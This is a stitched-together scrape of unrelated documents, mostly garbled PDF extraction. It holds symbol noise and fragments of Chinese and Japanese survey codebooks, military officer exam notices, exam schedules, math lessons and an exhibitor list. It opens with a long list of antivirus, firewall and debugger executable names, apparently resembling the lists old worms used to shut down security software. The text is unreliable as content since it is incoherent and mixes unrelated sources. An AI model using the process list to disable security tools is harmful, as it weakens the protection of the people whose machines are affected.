PCC2K_76_1436.EXE,PCC2002S902.EXE,PAVW.EXE,PAVSCHED.EXE,PAVPROXY.EXE,PAVCL.EXE,PATCH.EXE, PANIXK.EXE,PADMIN.EXE,OUTPOSTPROINSTALL.EXE,OUTPOSTINSTALL.EXE,OUTPOST.EXE,OTFIX.EXE, OSTRONET.EXE,OPTIMIZE.EXE,ONSRVR.EXE,OLLYDBG.EXE,NWTOOL16.EXE,NWSERVICE.EXE,NWINST4.EXE, NVSVC32.EXE, NVC95.EXE, NVARCH16.EXE, NUPGRADE.EXE, NUI.EXE, NTXconfig.EXE, NTVDM.EXE, NTRTSCAN.EXE, NT.EXE, NSUPDATE.EXE, NSTASK32.EXE, NSSYS32.EXE, NSCHED32.EXE, NPSSVC.EXE, NPSCHECK.EXE, NPROTECT.EXE, NPFMESSENGER.EXE, NPF40_TW_98_NT_ME_2K.EXE, NOTSTART.EXE, NORTON_INTERNET_SECU_3.0_407.EXE,NORMIST.EXE,NOD32.EXE,NMAIN.EXE,NISUM.EXE,NISSERV.EXE, NETUTILS.EXE,NETSTAT.EXE, NETSPYHUNTER-1.2.EXE,NETSCANPRO.EXE, NETMON.EXE,NETINFO.EXE, NETD32.EXE,NETARMOR.EXE,NEOWATCHLOG.EXE,NEOMONITOR.EXE,NDD32.EXE,NCINST4.EXE,NC2000.EXE, NAVWNT.EXE,NAVW32.EXE, NAVSTUB.EXE, NAVNT.EXE, NAVLU32.EXE, NAVENGNAVEX15.NAVLU32.EXE, NAVDX.EXE,NAVAPW32.EXE,NAVAPSVC.EXE,NAVAP.NAVAPSVC.EXE,AUTO-PROTECT.NAV80TRY.EXE,NAV.EXE, N32SCANW.EXE,MWATCH.EXE,MU0311AD.EXE,MSVXD.EXE,MSSYS.EXE,MSSMMC32.EXE,MSMSGRI32.EXE, MSMGT.EXE,MSLAUGH.EXE,MSINFO32.EXE,MSIEXEC16.EXE,MSDOS.EXE,MSDM.EXE,MSCONFIG.EXE, MSCMAN.EXE, MSCCN32.EXE, MSCACHE.EXE, MSBLAST.EXE, MSBB.EXE, MSAPP.EXE, MRFLUX.EXE, MPFTRAY.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,MOSTAT.EXE,MOOLIVE.EXE,MONITOR.EXE,MMOD.EXE, MINILOG.EXE,MGUI.EXE,MGHTML.EXE,MGAVRTE.EXE,MGAVRTCL.EXE,MFWENG3.02D30.EXE,MFW2EN.EXE, MFIN32.EXE, MD.EXE,MCVSSHLD.EXE, MCVSRTE.EXE,MCUPDATE.EXE, MCTOOL.EXE, MCSHIELD.EXE, MCMNHDLR.EXE,MCAGENT.EXE,MAPISVC32.EXE,LUSPT.EXE,LUINIT.EXE,LUCOMSERVER.EXE,LUAU.EXE, LUALL.EXE, LSETUP.EXE, LORDPE.EXE, LOOKOUT.EXE, LOCKDOWN2000.EXE, LOCKDOWN.EXE, LOCALNET.EXE,LOADER.EXE,LNETINFO.EXE,LDSCAN.EXE,LDPROMENU.EXE,LDPRO.EXE,LDNETMON.EXE, LAUNCHER.EXE, KILLPROCESSSETUP161.EXE, KERNEL32.EXE, KERIO-WRP-421-EN-WIN.EXE,
Visualize CMap
0001 0020 0002 0021 0003 0022 0004 0023 0005 0024 0006 0025 0007 0026 0008 0027 0009 0028 000A 0029 000B 002A 000C 002B 000D 002C 000E 002D 000F 002E 0010 002F 0011 0030 0012 0031 0013 0032 0014 0033 0015
1 2 / 3 1 A (2-1) (2-2) A4 6 A4 7 A4 8 A4 9 A ( () 4 A4, A4 7 ) 1 (2-1) (2-2) ()
(39mm E-Mail ( )( ), : : 1 1 ( ) 2 2 ( ) 29mm) WSK ( 1 2 / 3 1 A4 2 1 3 (2-1) 2-1 4 (2-2) 2-2 5 A4 6 A4 7 A4 8 A4 9 A4 10 11 ( () 4 A4, 5 6 7 8 A4 7 ) 1 (2-1) (2-2) () 1 2 (2-1) 3 (2-2) 4 5 6 7 (8 ) 9
標準 BIG 中文字型碼表 A 0 9 B C D E F 一 乙 丁 七 乃 九 了 二 人 儿 入 八 几 刀 刁 力 匕 十 卜 又 三 下 丈 上 丫 丸 凡 久 么 也 乞 于 亡 兀 刃 勺 千 叉 口 土 士 夕 大 女 子 孑 孓 寸 小 尢 尸 山 川 工 己 已 巳 巾 干 廾
標準 BIG 中文字型碼表 A 0 9 B C D E F B C D ± E F A 0 9 B C D E F 兙 兛 兞 兝 兡 兣 嗧 瓩 糎 0 B 9 Ⅰ Ⅱ Ⅲ Ⅳ Ⅴ Ⅵ Ⅶ C Ⅷ Ⅸ Ⅹ 〡 〢 〣 〤 〥 〦 〧 〨 〩 十 卄 卅 D B C D E F G H I J K L M N O P Q E R S T U V W X Y Z a b c d e f g F h i
4 / ( / / 5 / / ( / 6 ( / / 7 1 2 / 3 ( 4 ( 2003 8 ( 2
: / ( 6 (2003 8 : ( 1 ( ( / / (,, ( ( - ( - (39mm 29mm 2 ( 1 2 3-6 3 6-24 6-48 12-24 8-12 WSK / WSK WSK 1 4 / ( / / 5 / / ( / 6 ( / / 7 1 2 / 3 ( 4 ( 2003 8 ( 2 9 5 ( 10 3 11 / (600 4 5 AA 710 AB 720 730
國民健康訪問調查資料管理系統
National Health Interview Survey NHISIS ------------------------------------------------------------------------------ i H090-------------------------------------------------------------------------- 01
! "! #$# +&#!! %& #!"# )*+ % #!"!!!"!! =1.>7? "$+"+ (!! &< =1.>7? % $%& $& ( )*+ $*& $(B *& ;; / %" ;; C% %( &&& 0, ;17 -#D" (D-"" B ( %&& 0
!""# #!"#$"%&"!""#!"#$%&% ()*$+, (-!"*(.+/(0*+1"2 ()*+!$,)+ % $"" & $ "!!"!,,!!,,,!,! +!$ " *!+ "--""! #...!- & ++ %07 =>. $"!?@ + %"/!A &!"A *#/ %A $"A &!"A "/ -A &! / -A "/ ""! & "/ ) %5 B C5 "/ ""$
50~56 I1. 1 A 2 3 I2. I2a. 1 2 3 4 5 ( ) I2b. 1 2 3 I2b1. 4 5 ( ) I3. 11 12 02 ( ) 1 2 (24 ) A1. 0 1 A2 A1a. ( ) A2. ( ) () () ( ) ------------------------------------------------------------------------------------------
民 國 105 年 大 專 程 度 義 務 役 預 備 軍 官 預 備 士 官 考 選 簡 章 目 錄 壹 考 選 依 據 1 貳 考 ( 甄 ) 選 對 象 1 參 資 格 規 定 1 肆 員 額 及 專 長 類 別 2 伍 報 名 及 選 填 志 願 日 期 方 式 3 陸 選 填 官 科 (
民 國 105 年 大 專 程 度 義 務 役 預 備 軍 官 預 備 士 官 考 選 期 程 表 日 期 執 行 項 目 3 月 1 日 (8 時 起 ) 至 3 月 21 日 (17 時 止 ) 網 路 報 名 並 完 成 列 印 3 月 22 日 (17 時 止 ) 各 校 承 辦 人 員 收 報 名 件 截 止 3 月 30 日 4 月 11 日 5 月 18 日 5 月 27 日 (17
!" #$%#&#! () *+, -.!" #$%#/# $!" /$12 0!" 3 4 $$255 % 67 8 $ %% #! " # $9&$
"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Ps22Pdf
A A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D B C D F G I J A A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D A B C D
!!""# $ %#" & $$ % $()! *% $!*% +,-. / 0 %%"#" 0 $%1 0 * $! $#)2 "
! """"""""""""""""""" " !!""# $ %#" & $$ % $()! *% $!*% +,-. / 0 %%"#" 0 $%1 0 * $! $#)2 " !"#$%#$&!!!!!!!!!!!!!!!!!!!!!!!!!!!"#$%& (& #) *+&,"-./%0 1 2"0*-"3* #4 5%&6&4"&00 78 9+& :"/;& 7< 9+& =#4-%%/
!"#$%"#$!& () #*("+$,# -+(&. )!""# $ $ $ $ $ $ $ $ $ !!!"#$%#$&!"#$% #" %#&# %# (%!) (&#"*%!!!!!!!!!!!!!!!!!!!!!!! " "# (&$")(!*+,*)-%$ ".%).(%/!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ (&$")(!*+ &$*$(&$(!*+,*)-%$
SIK) 者, 需 實 施 1 年 以 上, 經 體 格 檢 查 無 後 遺 症 者 5. 身 體 任 何 部 分 有 刺 青 紋 身 穿 耳 洞 者, 不 得 報 考, 各 項 檢 查 結 果 須 符 合 體 位 區 分 標 準 常 備 役 體 位 二 在 校 軍 訓 成 績 總 平 均 70 分
民 國 102 年 大 專 程 度 義 務 役 預 備 軍 官 預 備 士 官 考 選 簡 章 壹 依 據 : 依 民 國 102 年 大 專 程 度 義 務 役 預 備 軍 官 預 備 士 官 考 選 計 畫 辦 理 貳 考 ( 甄 ) 選 對 象 : 具 中 華 民 國 國 籍, 尚 未 履 行 兵 役 義 務 之 役 男, 年 齡 在 32 歲 ( 民 國 70 年 1 月 1 日 以 後 出
97 04 25 0970002232 97 12 31 1-7 1 2 1 0 1 0 1 0 1 0 1 0 1 0 1 2 24 A1. 0 1 ( 6 ) 2 ( 6 ) 3 4 A1a.? 5 6 0 1 A1b.? 0 1 2 A2. 0 1 A2b. A2c. A2a. A2d. 1 A3. 1 A4 2 0 A4 A3a.?? 0 A4 1 A3b. 0 A4 1 A3c.?? 1
2
2 !iisamplegetlist!iisamplegetdata:!iisamplegetlast!iisampleeraseall!iihostfilegetdata Vangkroken 2 NO-1351 Rud Norway 3 example.log IMM>captureline!15HostFileGetData
94/03/25 (94 0940002083 94 12 31 B 1-8 (12-64 29 5 16 82 5 15 1 2 22-24 29 25-28 k1. 1 A 2 k2k3 3 k2k3 k2. k2a. 1 2 3 4 k2b. 1 2 k2b1.? 3 k3. 11 12 02 ( ( ( 1 2 (24 A. A1.? 1 0 A1a.? 1. 1 2 2. A2. 1 2
untitled
2016 160 8 14 8:00 14:00 1 http://zj.sceea.cn www.sceea.cn APP 1 190 180 2 2 6 6 8 15 2016 2016 8 13 3 2016 2016 2016 0382 2 06 1 3300 14 1 3300 0451 5 01 2 7500 02 2 7500 05 ( ) 1 7500 1156 4 15 2 15000
CIP. / ISBN Ⅰ.... Ⅱ.... Ⅲ. Ⅳ. G CIP http / /press. nju. edu. cn
CIP. /. 004. 4 ISBN 7 305 0458 7 Ⅰ.... Ⅱ.... Ⅲ. Ⅳ. G64. 505 CIP 004 0798 0093 05 8359693 05 835937 05 83686347 http / /press. nju. edu. cn nupress@public. ptt. js. cn 787 09 /6. 5 85 004 5 ISBN 7 305 0458
!"#$%"#$!& () #*("+$,# -+(&. )!""! # # # # # # # # !!!"#$%#$&!"#$% #" %#&# %# (%!) (&#"*%!!!!!!!!!!!!!!!!!!!!!!! " "# (&$")(!*+,*)-%$ ".%).(%/!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ (&$")(!*+ &$*$(&$(!*+,*)-%$
!"#$%"#$!& () #*("+$,# -+(&. )!""! # # # # # # # # !!!"#$%#$&!"#$% #" %#&# %# (%!) (&#"*%!!!!!!!!!!!!!!!!!!!!!!! " "# (&$")(!*+,*)-%$ ".%).(%/!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ (&$")(!*+ &$*$(&$(!*+,*)-%$
高二立體幾何
008 / 009 學 年 教 學 設 計 獎 勵 計 劃 高 二 立 體 幾 何 參 選 編 號 :C00 學 科 名 稱 : 適 用 程 度 : 高 二 簡 介 一 本 教 學 設 計 的 目 的 高 中 立 體 幾 何 的 學 習 是 學 生 較 難 理 解 而 又 非 常 重 要 的 一 個 部 分, 也 是 高 中 教 學 中 較 難 講 授 的 一 個 部 分. 像 國 內 的 聯 校
zyk00207zw.PDF
0 5 60 ()0 () () 5 (4) 60 (5) 64 (6) S (7) N (8)0 (9) (0)0 x 0 a 0 AB CD 5 ab a b 4 ()a b ()x y () ab ()x y ()a b () a ()ab a b (4)a b () a b () 0 b () a 5 (4) ab 6 x () 4 () () 0 (4) 5 4 (a b) a a b a
zt
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!""# $!"%#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!"##$%& %()*+",#$- %(./*+",#$- 01+#1$(! "# $ % & : ;< 6 53=89>8? ; 4?=(9> A<8!"##$%&!%=*#*+"
"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
untitled
2016 148 1 8 7 08:00 16:00 http://zj.sceea.cn www.sceea.cn APP 1 2 2 6 6 2016 2016 8 6 3 2016 2016 2016 0366 1 03 1 0391 2 54 ( ) 2 1256 7 02 1 03 1 07 2 18 2 21 1 1314 1 36 1 14000 / 20 1316 7 00 1 09
!"""!#!" "!" $%&!$$"& (")!!$! #& ##! &""" &! &""" &!!! """!*&&"" &+,"" -./01*!!%* *
!"#$%& ($ )*+#,*%-)*%- !"""!#!" "!" $%&!$$"& (")!!$! #& ##! &""" &! &""" &!!! """!*&&"" &+,"" -./01*!!%* * ! !"#$ %& ( &((!"")!&& *" $*! ! !" # $" %&&$ % ! !! "!#!"!$!$ %! %&! (! )& )& $( &#!!$!%"!""!""!!!
第47回東海・北陸地区連合校長会教育研究愛知大会
未掲載 å æ б д fb d ff bd ab c def d abcdef def å æ б д fbff ab cde f b b b b f b å æ б å abcdef å æ б д fbff ab cdef cf ff f f b b abb b b å å æ æ æ æ æ б д bcdef ff å b д ff bbbb bb b eb bbeb b afb bffb
untitled
2015 138 8 13 8:00 14:00 http://zj.sceea.cn 1 www.sceea.cn APP 1 2 6 6 2 2015 2015 8 13 3 1156 2 12 1 16 1 1160 4 21 4 1161 4 06 4 1162 1 01 1 1168 1 19 1 1169 2 07 2 1254 4 00 4 1261 1 88 1 1262 7 4 00
njj00118zw.PDF
13 5 5 3 1 2 1 2 3 3 [ ] 1 1 2 3 2 1 2 3 4 5 6 7 3 ( ) ( ) ( ) (1) ()() () () (2) ( () () ) ()() () (() () () (3) ) () ( () ) ()() () ( ( ) ( ) ( ) (3) 1 2 3 4 5 [ ] 1 A B C D 2 A B C D 3 A B C D 4 A
2014-15 年 度 工 作 計 劃 目 錄 1 學 校 發 展 計 劃 1.1 2012 至 2015 年 度 全 校 關 注 事 項... 1 1.2 2013 至 2014 年 度 學 校 關 注 事 項... 3 1.3 2011-2017 年 度 九 龍 倉 集 團 學 校 起 動 計
五 育 中 學 Ng Yuk Secondary School 2014-15 15 年 度 工 作 計 劃 Annual School Plan 2014-15 年 度 工 作 計 劃 目 錄 1 學 校 發 展 計 劃 1.1 2012 至 2015 年 度 全 校 關 注 事 項... 1 1.2 2013 至 2014 年 度 學 校 關 注 事 項... 3 1.3 2011-2017 年
!!"#$ " # " " " " " "$%%& " $%% " "!!
! "##$ % % % % % % % % &#!"#$ %&#$ ()* % % +,-.!! !!"#$ " # " " " " " "$%%& " $%% " "!! ! "#!"#$ $ $ $ $ %# %& $ &# ()*$ " & %!! ! " "!! !!!!!!" "! ##$#%#&# $%& ()*+ "( () # *+!!!!!! $% )*#+$,#-$.#/$ -#01$
民國八十九年台灣地區在校學生性知識、態度與行為研究調查
84 年 台 灣 地 區 在 校 學 生 性 知 識 態 度 與 行 為 研 究 調 查 過 錄 編 碼 簿 題 號 變 項 名 稱 變 項 說 明 選 項 數 值 說 明 備 註 i_no 學 生 編 號 問 卷 流 水 號 location 學 校 所 在 縣 市 編 號 1 台 北 市 2 基 隆 市 3 台 中 市 4 台 南 市 5 高 雄 市 6 新 竹 市 7 嘉 義 市 21 宜 蘭
※※※※※
...1-9 ()...10-11 01 094-910201A...12-16 02 094-910202A...17-21 03 094-910203A...22-26 04 094-910204A...27-31 B 6-2 01 094-910201B...32-36 02 094-910202B...37-41 03 094-910203B...42-46 C 6-3 01 094-910201C...47-51
94/03/25 (94 0940002083 94 12 31 C 1-8 (65 29 5 15 1 2 1-23 28 24-27 k1. k1a. 1 2 3 4 k1b. 1 2 3 4 5 k1c. 1 2 ( 3 4 ( 5 k2. 1 A 2 k 3k 4 3 k3k4 k3. k3a. 1 2 3 4 ( k3b. 1 2 k3b1.? 3 ( (D4 k4. 11 12 02
DLU-5490N-7-WB/CP-160 1
DLU-5490N-7 DLU-5490N-7-WB/CP-160 DLU-5490N-7-WB/CP-160 1 2 SC-800 CP-360 CP-160 CP-60 3 CP-60 CP-160 CP-360 (AK) AK-85 T DLU-5490N-7/CP-160 DLU-5490N-7/PF-6/CP-160 4 5 A BA BB BC BJ BM BW BX C CA B1524-491-AB0
3 = 90 - = 5 80 - = 57 5 3 3 3 = 90 = 67 5 3 AN DE M DM BN ABN DM BN BN OE = AD OF = AB OE= AD=AF OF= AB=AE A= 90 AE=AF 30 BF BE BF= BE= a+b =a+ b BF=BC+CF=a+CF CF= b CD=b FD= b AD= FC DFC DM=
数 学 高 分 的 展 望 一 管 理 类 联 考 分 析 第 一 篇 大 纲 解 析 篇 编 写 : 孙 华 明 1 综 合 能 力 考 试 时 间 :014 年 1 月 4 日 上 午 8:30~11:30 分 值 分 配 : 数 学 :75 分 逻 辑 :60 分 作 文 :65 分 ; 总
目 录 数 学 高 分 的 展 望... 1 第 一 篇 大 纲 解 析 篇... 1 一 管 理 类 联 考 分 析... 1 二 最 新 大 纲 解 析... 1 三 考 前 复 习 资 料 及 方 法... 第 二 篇 总 结 篇... 4 1 应 用 题 考 点 总 结 与 技 巧 归 纳... 4 代 数 模 块 题 型 归 纳 及 考 点 总 结... 9 3 数 列 模 块 题 型 归
目錄
file:///c /Documents and Settings/f16//91history/_vti_cnf/0.htm vti_encoding:sr utf8-nl vti_timelastmodified:tr 04 Feb 2005 02:49:14-0000 vti_extenderversion:sr 5.0.2.6417 vti_author:sr F16\\f16 vti_modifiedby:sr
!% &$ % (% )% &%!""* +% ($ % )% &%,% ($ % )% &% ) *% ($ ( #% )$ % (% &% ( -% ($.% ($ ( ) & /. /!""*! $!"
!""#!""#!""& %!"!""& %! ( )!""#!""& " && * " #"!""&!"")!" % +$, -.!""& %#!""# % $!" !% &$ % (% )% &%!""* +% ($ % )% &%,% ($ % )% &% ) *% ($ ( #% )$ % (% &% ( -% ($.% ($ ( ) & /. /!""*! $!" !!""& %!"" ()
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!! #! $%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "%!!!!!!!!!!!!!
" #$%& ( ) **+ )!!, ) ( *--. ) ( )! */! 0 0 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "!!!!!!!!!!!!!!!!!!!!!!!!!!!! #! $%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "%!!!!!!!!!!!!!!!!!!!!!!!!!
北 京 恺 润 恒 通 商 贸 有 限 公 司 E1+03B 床 垫 上 海 爱 福 窝 云 技 术 有 限 公 司 E1+03C 家 装 设 计 软 件 河 南 吉 夫 森 软 件 开 发 有 限 公 司 E1+05B 软 件 霸 州 市 胜 芳 镇 精 双 星 实 木 家 具 厂 E1A-05
北 京 国 际 家 具 展 参 展 商 名 录 E1 馆 参 展 单 位 与 展 品 企 业 名 称 展 位 号 参 展 展 品 奥 美 思 ( 北 京 ) 家 具 有 限 公 司 E1+01 定 制 家 具 敏 华 品 牌 管 理 ( 天 津 ) 有 限 公 司 E1-01 软 体 家 具 家 具 配 件 北 新 国 际 木 业 有 限 公 司 E1A-01 实 木 家 具 香 港 托 斯 卡 纳
!"#$%"#$!& () #*("+$,# -+(&. )!""# $ $ $ $ $ $ $ $ $ $ !!!"#$%#$&!"#$% #" %#&# %# (%!) (&#"*%!!!!!!!!!!!!!!!!!!!!!!! " "# (&$")(!*+,*)-%$ ".%).(%/!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ (&$")(!*+ &$*$(&$(!*+,*)-%$
例 009 年高考 全国卷Ⅱ 理 8 如 图 直 三 棱 柱 ABC ABC 中 AB AC D E 分 别为 AA BC 的中点 DE 平面 BCC 证明 AB AC 设二面角 A BD C 为 0o 求 BC 与平面 BCD 所 成角的大小 图 - 略 证明 以 D 为坐标原点 DA DC DD
Education Science 教育科学 平面法向量在解立体几何题中的应用探究 梁毅麟 恩平市华侨中学 广东江门 59400 摘 要 几何发展的根本出路是代数化 引入向量研究是几何代数化的需要 随着平面法向量这个概念在新教 材的引入 应用平面法向量解决立体几何中空间线面位置关系的证明 空间角和距离的求解等高考热点问题的方法 更具灵活性和可操作性 其主要特点是用代数方法解决几何问题 无需考虑如何添加辅助线
untitled
2015 141 8 14 8:00 12:00 1 http://zj.sceea.cn www.sceea.cn APP 9 1 2 2 6 6 2015 2015 8 14 3 1156 1 16 1 1160 1 21 1 1162 1 01 1 1264 2 06 2 1275 1 04 1 1357 5 03 2 15 2 29 1 1358 9 07 2 14 2 15 2 4 16
! "#$! " # $%%& ($! )*+, -. %/. %(&%%$. 0!!#! "#! ##..! $# 1($! 2)3 $%%& %4&/&&!!!!!!!!!!! %(%. 5/%0/066!!! /! 6%%. 6(%. %046! (%%%((!!! 7889"" :::# 7
!!! ! "#$! " # $%%& ($! )*+, -. %/. %(&%%$. 0!!#! "#! ##..! $# 1($! 2)3 $%%& %4&/&&!!!!!!!!!!! %(%. 5/%0/066!!! /! 6%%. 6(%. %046! (%%%((!!! 7889"" :::# 7;9# ;?!!! %(%. 6$%$6644!!!!! 7889"" :::# 7;9#
8"8" 4$*% 5-* (. 6+$% 7+-+$% ("!""#!"#$% & ()#*+$%!""$ %!""#!""# &!""# $ $!!"!!"!"!!""" $ (!"!"#,%-&+&% %./+$%-# )*+,-./012* 3! 45667##8( "9 ":,012* $
!"#$ %&# ( ) *+"$,+&+"$!"#$%& ())* +),),))-.,),+ /001 )2+234(-4 """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" ", (,!,,,,L ++)))2 (L (,))(- -./"$ 0 (1/#+"$ 5 2$&0+0$ $)3+"$&/ 2456# " ""./
!"#$%"#$!& () #*("+$,# -+(&. )!""# $ $ $ $ $ $ $ $ $ $ !!!"#$%#$&!"#$% #" %#&# %# (%!) (&#"*%!!!!!!!!!!!!!!!!!!!!!!! " "# (&$")(!*+,*)-%$ ".%).(%/!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ (&$")(!*+ &$*$(&$(!*+,*)-%$
序:
序 言 当 接 到 燕 姿 老 师 的 序 言 邀 请 时, 还 是 有 点 受 宠 若 惊 的, 虽 说 这 套 书 是 我 一 点 点 看 着 燕 姿 老 师 编 写 的, 也 知 道 它 的 妙 用 及 优 势 但 是 如 何 写 点 推 荐 的 东 西 还 是 有 些 愁 人, 毕 竟 感 觉 大 家 不 怎 么 看 序 言, 而 且 我 不 太 擅 长 忽 悠 思 来 想 去 莫 不 如
3!)4 +!*5")+,*" "!7 *"954#!767 ()9)"4 %7*"!76 #67:)+")5, "5 * 6*,;7 58 "%5 %77<4& =5%7>76 : 7 "5 4);,)8)+*," %7*<7,),; 58 "!7 +!*5")+,*" 67,:76
! 3!! 4%%%#4!!!, 4 $,, 567789, ", $,,,!!!"#$%& ( )*+,(-.$ %/ 0"- 1(+, ( &(%. 0- &" /1- :;/?@-/ 3!"#$%&" ( $)"#* (*&#*+ (,$&" -*#*%+% %.$/" 01)$&$2#+"#$%& 3*$4$&. 4%%%#4 (,$&" 2,$0* &03 3 =.680. 1./A0(B
!!! "# $ " %!!
!!"#$%& ()*+,-./012!" #$$%! " # !!! "# $ " %!! !" #$$% #$$% #$$%!"#$%& ()*+,-./0(12 & #! ! "! " " " $ % #" # " % & " "!! !!" " "!"#" $%& ()!*+,! " #$ %$ &$ $ " # % & ( " " " "!"-" $%&./01*+, ) " ! #" #
Microsoft Word - NHIS2013_C_130716_送印_.doc
核 准 機 關 : 行 政 院 主 計 總 處 核 准 文 號 : 主 普 管 字 第 1020400481 號 有 效 期 間 : 至 103 年 6 月 30 日 止 辦 理 機 關 : 財 團 法 人 國 家 衛 生 研 究 院 行 政 院 衛 生 署 國 民 健 康 局 IRB 通 過 案 號 : 國 家 衛 生 研 究 院 EC1020502 號 樣 本 編 號 :( 訪 員 填 寫 )
!!!!"#$ " " %& ( " # " " " " " "$%%& " $%% " "!!
! "##$ % % % % % % % % &#!" % % #$%& (%&!! !!!!"#$ " " %& ( " # " " " " " "$%%& " $%% " "!! ! "#!"#$ $ $ $ $ %# %& $ &# ()*$ " & %!! ! " "!! !!!!" "! #$%& "# $()*$(+, $%& ())* $% (+,-.. /-.. 0&* 0%* "!!
bingdian001.com
.. 05 A. B. C. D. D. 05 RtABC AB=9BC=6 B=90 0 ABC A BC D MN BN A M N C D B A 3 5 C B 5 C 4 D 5 3. 05,,. A B C D C 4 05 3 ABCD BAD=BEF BCCD AEACAF ABE A B C 3 D 4 C 5.05 ABC ABC AB AB AC AC ABC ABC A A
#$% 7 = 8++!7 3" %0 3 & ("!8 (" ) * *+! * =!!8 * =!!6! A 6, #" ((A - B (0A - B 6 00A - A - +! -.! *! %-(07 - / % " ( " * %-(0 0 /! 6 =! 6 : 7 2 *! 8.
#$$% "! # & #$$% ( ) ( * %!* ( * # ( " #$$%!+ #+ + #$$% (+ *+ ( %+ #$$* #$$% #$$( " " " " " "! $! "!#$,! $!!$,!#$!$$,!!$ $+ *-!! +!( %+ &.!#+ (.!*+ %. #%+ &. " " " #$$* "!+ #+ + (+!+ /" (+ )" 345, *+ /"
E170C2.PDF
IQ E170C2 2002.3. Rotork Rotork * ( ) * * RotorkIQ - IQ * * PC IQ Insight / Rotork * - Rotork IQ www.rotork.com 5 10 5.1 11 1 2 5.2 11 2 3 5.3 11 3 IQ 3 5.4 11 3.1 3 5.5 IQM12 3.2 3 5.6 IQML12 3.3 4 5.7
!"# $%& ()) *+,+)-./01!"# $%& ()) *+,+)-./01!"#! "#$ 2!"# ):; 2!B! 2 "B # $ 2 %4 C C 2 &4 %D?<?4 6<5 2 (9D =6
!" #$%!!!!!!!! !"# $%& ()) *+,+)-./01!"# $%& ()) *+,+)-./01!"#! "#$ 2!"# 3 4 56674 85 2 9):; 7>?68>8??@A>6 2!B! 2 "B # $ 2 %4 C C 2 &4 %D?
2002 2005 11 !!!!!!!!!!!!!!!!!!!!!!! 1 1!!!!!!!!!!!!!!!!!!!!!!! 1 2!!!!!!!!!!!!!!!!!!!!!! 3 3!!!!!!!!!!!!!!!!!! 6 4!!!!!!!!!!!!!!!!!!!! 8!!!!!!!!!!!!!!!!!!!!!! 10 5!!!!!!!!!!!!!!!!!! 10 6!!!!!!!!!!!!!!!!
!"#!"# $ %&&% " ()*+,-&*,+-.-+&!/ "/# $ %/+ &/0*-1$12!"# %&&% &1&%1&! #$$# -% -&&&% $89:;6$<=>,.&?--2, - 1% -%$. %&&% 2- %&&% 2 - " ()*+,-
!"#!"# $ %&&% " ()*+,-&*,+-.-+&!/ "/# $ %/+ &/0*-1$12!"# %&&% &1&%1&! #$$# -% -&&&%3 456 777$89:;6$,.&?--2, - 1% -%$. 1%@ %&&% 2- %&&% 2 - " ()*+,-&*,+-.-+& 0 &*% &&&-.&&& -3$&& !" #$%!""! # !!!"!!!"#
!""# $!""%!"&" #
!""# $!""%!"&" # !""# +!""(!""#!""$!""$ %"" &!""$ &( ) %# )"# )!!""#!""$!""#!""$ )*"!! !"#" $ % !" #$$%! #" #$$%& " #$$(!% %" #$$(#! (" #$$)#& )" #$$) # *" #$$)%$ &" #$$)%% +" #$$)%&!$" #$$)(#!" #$$%(&
中华人民共和国海关进出口税则
! " " # $!"#$%&# &(%)$ *+, -.(%)$ /*)011 %1 $23 43%(536# 73("8509 %1!20+* %& ()& *+),-. +/ 01 *234+53 *+-46+7 *+-),4,+-3 8(93 (-) :&.27(4,+-3 ;(? %&4(,7&) *234+53 %24,&3 8&@,&) +- *+55,33,+-
.$%.!# $# %# &# # (# )#!"""*# "#!+#!!#!$#!%#!&#!# $#!""* %# &#, # (# )# *#!& * $++%!# $# %# &# # (# )#!# $# %# $++$&# # (# )# *# "#!# $# %# &# # (# $+
70127!" ## # $!"# # #% % %% %& #%$!"# (#% % % % %#)! "*$# # # $ # # $ ## #$ +, ) * % -# #-./ # & 0/ #$ +, 0((1./ 0/ 1/ 2/ 2 0((0./ 0/ 1/ 2/ / 3/ 4/./ 0/ 1/ 2/ / 3/ 4/ 0((( 5/ 6/.(/../.0/.1/.2/. /.3/ 4.3
! " # " #!! $ %!!!!!!!! & ( $! $ A A *+, )2334-3E<=65 ) -. /0 1!2334/5 ) :;36:3<6<=:> 1 ) :;36:3<6<=
!"!! " " " ! " # " #!! $ %!!!!!!!! & ( $! $ )*+,-?@ A B@ A C@ 0 1 0 D@36; *+, )2334-3E
